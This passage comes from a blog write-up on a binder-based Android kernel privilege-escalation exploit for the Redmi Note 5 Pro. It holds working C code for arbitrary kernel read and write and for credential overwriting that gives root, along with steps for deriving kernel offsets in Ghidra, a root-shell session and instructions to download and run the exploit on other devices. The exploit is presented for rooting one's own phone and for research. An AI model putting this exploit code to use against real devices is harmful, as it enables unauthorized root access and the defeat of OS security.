    // binder_fd, epfd and dummy are globals (see the full code on Github)
    binder_fd = open("/dev/binder", O_RDONLY);
    epfd = epoll_create(1000);
    dummy = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE,
                 MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

    // `leak` is `thread + 0xa8`; get_leak() wraps the leak from the previous chapter
    uint64_t leak = get_leak();
    printf("leak  = %016lx\n", leak);
    printf("*leak = %016lx\n", kread_u64(leak)); // if this prints the same value as above
                                                 // then arbitrary kernel read works
    kwrite_u64(leak, 0xdead5ec);
    printf("*leak = %016lx\n", kread_u64(leak)); // if this prints 0xdead5ec
                                                 // then arbitrary kernel write works
    return 0;
}
```
whyred:/ $ /data/local/tmp/exploit
leak  = ffffffe031e43ca8
*leak = ffffffe031e43ca8
*leak = 000000000dead5ec
Game over.

Become root and disable the security

With arbitrary read and write kernel access we can basically do whatever we want.
To become root, the first thing to do is rewrite your own credentials, i.e. your IDs.
In order to do this you need to know where to write.
For this we use intermediate structures until finding the kernel base.
From there we use calculated offsets to reach our final targets.
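In short: for a regular app, mm->user_ns points at the kernel global init_user_ns, and the runtime address of a kernel global minus its offset in the kernel image gives the kernel base. Below is a sketch of the chain (the task pointer is the one leaked by the exploit; all the offsets are derived in the next sections):
// sketch of the chain walked in this chapter
u64 mm      = kread_u64(task + 0x4d8);  // current->mm
u64 user_ns = kread_u64(mm + 0x308);    // mm->user_ns, i.e. &init_user_ns
u64 kbase   = user_ns - 0x239e358;      // init_user_ns sits at kbase + 0x239e358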

Check kernel base

The offsets we use depend on the kernel build: even different regional variants of the same ROM version can ship kernels with different offsets.
An offset is the number of bytes the compiler places between the start of a structure and one of its members.
For example, the offset of wait in binder_thread is 0xa0 for my kernel. I have assumed this value throughout the article, but in other kernels it may differ.
If an offset is only used for accessing data then just changing a constant works, but if it impacts the exploit core (e.g. if offsetof(struct binder_thread, wait) = 0xb8) then the exploit itself must be changed (it's a good exercise by the way).
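If offsets are new to you, here is a tiny standalone example (unrelated to the kernel, assuming a 64-bit Linux ABI):
#include <stdio.h>
#include <stddef.h>

struct example {
    long a;  // bytes 0-7
    char b;  // byte 8, followed by 7 bytes of padding
    long c;  // bytes 16-23
};

int main(void){
    // prints 0x10: the compiler placed `c` 16 bytes after the start of the struct
    printf("offsetof(struct example, c) = 0x%zx\n", offsetof(struct example, c));
    return 0;
}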
Anyway, finding offsets is non-trivial but it's no magic, everybody with enough motivation can do it.
The method is the same for each offset:
  • get your kernel source code or a reasonably close one if you don't have access to it
  • get Ghidra
  • get your compiled kernel and a prepared ELF from it for Ghidra
  • in the source code, find a function call using the variable for which you want the offset
  • in Ghidra, open the compiled kernel and look for the function that does this call
  • with the help of the decompiler, look for that same call
  • that's the tricky part: now you have to make an educated guess based on the information in front of you
For the kernel base check we need three offsets here:
  • mm in a task_struct
  • user_ns in a mm_struct
  • init_user_ns (init user namespace) kernel symbol

Prepare the kernel ELF

For this we'll need Ghidra (or any disassembler you prefer) to read our kernel.
First get your current boot.img using EDL mode, an official update or anything else.
Then run these commands to extract the kernel, fix it and export the symbols.
bash
# download imjtool from http://newandroidbook.com/tools/imjtool.html
$ imjtool.ELF64 boot.img extract
$ git clone https://github.com/nforest/droidimg.git
$ gcc droidimg/fix_kaslr_arm64.c
$ ./a.out extracted/kernelimage extracted/kernelimage_fix_kaslr
$ ./droidimg/vmlinux.py extracted/kernelimage_fix_kaslr > symbols.txt
$ sudo pip3 install --upgrade lz4 git+https://github.com/marin-m/vmlinux-to-elf
$ vmlinux-to-elf extracted/kernelimage_fix_kaslr kernel.elf
[+] Successfully wrote the new ELF kernel to kernel.elf
Now you can load kernel.elf in Ghidra.

Find the offset of a member of a struct

First we need the offset of mm in task_struct:
I don't have the source code of my kernel (Xiaomi's 4.4.78-perf+) so I took the 4.4.79 one. In the previous part I got my boot.img via EDL mode, but any source works as long as it contains your exact kernel.
  • Open kernel.elf in Ghidra
  • Run ag "task\->mm" in the kernel source tree: there are a few dozen promising call sites
  • I chose the add_mm_counter_fast function in mm/memory.c because it's really short, so it's easy to find the correct value
linux/mm/memory.c
static void add_mm_counter_fast(struct mm_struct *mm, int member, int val)
{
    struct task_struct *task = current;

    // likely is only a macro used for branch prediction
    if (likely(task->mm == mm))              // <- this is a `x == param_1`
        task->rss_stat.count[member] += val; // <- this is a `+=`
    else
        add_mm_counter(mm, member, val);
}
  • In Ghidra, search for add_mm_counter_fast in the Functions window and open it in the decompiler window
ghidra_decompiled__linux_mm_memory.c
// ...
lVar2 = cRead_8(sp_el0);
if (*(longlong *)(*(longlong *)(lVar2 + 0x10) + 0x4d8) == param_1) { // <- this is a `x == param_1`
    lVar2 = *(longlong *)(lVar2 + 0x10) + (longlong)param_2 * 4;
    *(int *)(lVar2 + 0x514) = *(int *)(lVar2 + 0x514) + param_3; // <- this is a `+=`
}
// ...

Offset of mm in task_struct

From above it looks like the offset is 0x4d8. I'll let you find other occurrences of the 0x4d8 offset to confirm it.

Offset of user_ns in mm_struct

With ag "\->user_ns", then using would_dump from fs/exec.c, you easily find that 0x308 is the offset of user_ns in mm_struct.
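For reference, the line to spot there is the read of bprm->mm->user_ns (excerpt quoted from the 4.4 sources from memory and trimmed, so treat it as a sketch):
linux/fs/exec.c
void would_dump(struct linux_binprm *bprm, struct file *file)
{
    if (inode_permission(file_inode(file), MAY_READ) < 0) {
        struct user_namespace *old, *user_ns;

        bprm->interp_flags |= BINPRM_FLAGS_ENFORCE_NONDUMP;

        /* Ensure mm->user_ns contains the executable */
        user_ns = old = bprm->mm->user_ns;   /* <- in the decompiler: *(mm + 0x308) */

        /* ... walks up the namespaces, trimmed ... */
    }
}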

Offset of cred and real_cred in task_struct

With ag "\->real_cred", then using exit_creds from kernel/cred.c, you very easily find that 0x728 and 0x730 are the offsets of real_cred and cred in task_struct.
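For reference, here is exit_creds (trimmed of its debug output): the two back-to-back pointer loads are exactly what you will recognize in the decompiler, at offsets 0x728 and 0x730.
linux/kernel/cred.c
void exit_creds(struct task_struct *tsk)
{
    struct cred *cred;

    cred = (struct cred *) tsk->real_cred;  /* <- in the decompiler: *(tsk + 0x728) */
    tsk->real_cred = NULL;
    validate_creds(cred);
    put_cred(cred);

    cred = (struct cred *) tsk->cred;       /* <- in the decompiler: *(tsk + 0x730) */
    tsk->cred = NULL;
    validate_creds(cred);
    put_cred(cred);
}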

Offset of init_user_ns in kernel

The last thing we need is the address of the init_user_ns symbol.
I made you extract the kernel symbols above, so now you just have to run ag init_user_ns symbols.txt and you get:
ffffff800a41e358 D init_user_ns
You get the start of the kernel with head -n1 symbols.txt:
ffffff8008080000 t _head
So finally the offset is 0xffffff800a41e358 - 0xffffff8008080000, i.e. 0x239e358.

Actually check kernel base

In the kernel base check we verify two things: the kernel base itself and the creds values of init (more info at https://en.wikipedia.org/wiki/Init).
exploit.c
u64 current_mm      = kread_u64(task /* from the exploit */ + offset_of_task_struct_mm /* 0x4d8 */);
u64 current_user_ns = kread_u64(current_mm + offset_of_mm_struct_user_ns /* 0x308 */);
u64 kernel_base     = current_user_ns - ksym_init_user_ns /* 0x239e358 */;

// first check: the kernel base must be page-aligned
if (kernel_base & 0xFFF)
    err(1, "kernel base is not page-aligned");

u64 init_task = kernel_base + ksym_init_task /* 0x2394a90 */;
u64 cred      = kread_u64(init_task + offset_of_task_struct_cred);
u64 real_cred = kread_u64(init_task + offset_of_task_struct_real_cred);

// second check: `init_task` ids are 0 and all caps are set, for both cred and real_cred
if (kread_u32(cred + offset_of_cred_uid) || kread_u32(cred + offset_of_cred_gid) /* || ... */)
    err(1, "init_task not where expected");
if (kread_u64(cred + offset_of_cred_cap_permitted) != 0x3fffffffff /* || ... */)
    err(1, "init_task not where expected");
/* same checks for real_cred */

// third check: the uid in our own task's `cred` is our uid
u64 my_cred = kread_u64(task + offset_of_task_struct_cred);
if (kread_u32(my_cred + offset_of_cred_uid) != getuid())
    err(1, "bad cred");
If this passes there are pretty good chances that the offsets are the correct ones.

Patch creds

The credentials of the current task are stored in struct cred objects in kernel memory, pointed to by the cred and real_cred fields of its task_struct.
Patching creds is easy, we just have to write the correct values at the right spot: IDs and capabilities.
exploit.c
kwrite_u32(cred_ptr + offsetof(struct cred, uid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, gid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, suid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, sgid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, euid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, egid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, fsuid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, fsgid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, securebits), 0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_inheritable), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_permitted), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_effective), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_bset), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_ambient), ~(u64)0);
After doing this, we should be root so getuid() should return 0.
exploit.c
if (getuid()) err(1, "still not root after patching");
Now we spawn a shell from the exploit (see execl; a sketch is shown after the session below) and we get a # prompt in which we can ls /data and get an answer:
bash
whyred:/ $ ls /data
ls: /data: Permission denied
1|whyred:/ $ /data/local/tmp/exploit
whyred:/ # ls /data
FTM_AP app-asec      backup       dalvik-cache evt-test local      misc    mqsas        nvt_test    resource-cache system    time       vendor
adb    app-ephemeral bootchart    data         fota     lost+found misc_ce nativetest   ota         sdcard         system_ce tombstones
anr    app-lib       cache        dpm          hostapd  media      misc_de nativetest64 ota_package shared         system_de user
app    app-private   connectivity drm          lct_diag mediadrm   miui    nfc          property    ss             thermal   user_de
whyred:/ #
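The spawn itself can be as simple as this (a sketch using execl and Android's /system/bin/sh; the code on Github may do a bit more around it):
// we are root at this point: replace the exploit process with an interactive shell
execl("/system/bin/sh", "sh", (char *)NULL);
err(1, "execl");  // only reached if execl failed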

Becoming root isn't enough

Becoming root doesn't allow you to do everything, so there is still some work to do.
Three things remain; I'll leave it up to you to go read the code for them.

Final exploit

All of the previous code is in exploit.c on my Github page, along with some other useful files.

Apply on Redmi Note 5 Pro and others

Now that you have all the information you need about the exploit, you just have to apply it.

Redmi Note 5 Pro (whyred)

MIUI 10.3 and below

This is the version I'm using, so this one is easy: go to my Github and either:
  • download the APK, install it and run it on your phone
  • download the exploit as a binary (bin/exploit), upload it to your phone with adb to /data/local/tmp and run it (see the example session after this list)
  • download or clone the repo and run build.sh
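For the second option, the session could look like this (a sketch; bin/exploit and /data/local/tmp are the paths used above):
bash
$ adb push bin/exploit /data/local/tmp/exploit
$ adb shell chmod 755 /data/local/tmp/exploit
$ adb shell /data/local/tmp/exploit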

MIUI 11 and above

For now this method doesn't work on these versions.
I will try to flash MIUI 10.3 in EDL mode to see whether it works. I think it will, but I haven't tested it so I can't tell for sure.
If I succeed I will publish a script to flash everything as needed once in EDL mode.

Device with exploitable kernel

First of all, you can't know whether your kernel is exploitable before trying, because some compilation options may break the exploit.
You have to test for yourself on your own device.
There is close to no risk in doing so, as the exploit performs some checks before running.
You just have to find the offsets like described in the Check kernel base chapter above.
When you're done gathering all the offsets you can run the exploit with these and hopefully it will work.
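As a sketch, the result could be gathered in one hypothetical header like this one (the values shown are the ones found for my kernel in this article; yours will differ):
// hypothetical offsets.h: per-device values from the "Check kernel base" chapter
#define OFFSET_BINDER_THREAD_WAIT    0x0a0      // offsetof(struct binder_thread, wait)
#define OFFSET_TASK_STRUCT_MM        0x4d8      // offsetof(struct task_struct, mm)
#define OFFSET_MM_STRUCT_USER_NS     0x308      // offsetof(struct mm_struct, user_ns)
#define OFFSET_TASK_STRUCT_REAL_CRED 0x728      // offsetof(struct task_struct, real_cred)
#define OFFSET_TASK_STRUCT_CRED      0x730      // offsetof(struct task_struct, cred)
#define KSYM_INIT_USER_NS            0x239e358  // init_user_ns - _head in symbols.txt
#define KSYM_INIT_TASK               0x2394a90  // init_task - _head in symbols.txt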
If not, then reach out to me whichever way you prefer and I can try to sort it out with you.

Devices with patched kernel

If your current ROM has a patched kernel then, as for whyred, you may have some success flashing an old official ROM with an exploitable kernel.
However, if your phone manufacturer implemented an anti-downgrade mechanism, this may not work or may even hard-brick your device.
If you've read the article up to this point, I think you'll have no problem finding a way to downgrade, if it is possible for your device.

Resources



